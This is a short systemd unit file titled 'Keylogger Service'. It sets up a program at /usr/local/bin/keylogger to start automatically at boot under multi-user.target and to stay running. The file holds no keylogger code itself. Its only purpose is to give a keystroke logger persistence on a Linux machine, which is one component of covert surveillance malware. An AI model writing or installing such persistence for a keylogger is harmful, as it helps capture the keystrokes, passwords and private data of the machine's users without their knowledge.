[Unit]
Description=Keylogger Service
ConditionFileIsExecutable=/usr/local/bin/keylogger

[Service]
Type=simple
ExecStart=/usr/local/bin/keylogger
TimeoutSec=0
StandardOutput=tty
RemainAfterExit=yes

[Install]
WantedBy=multi-user.target
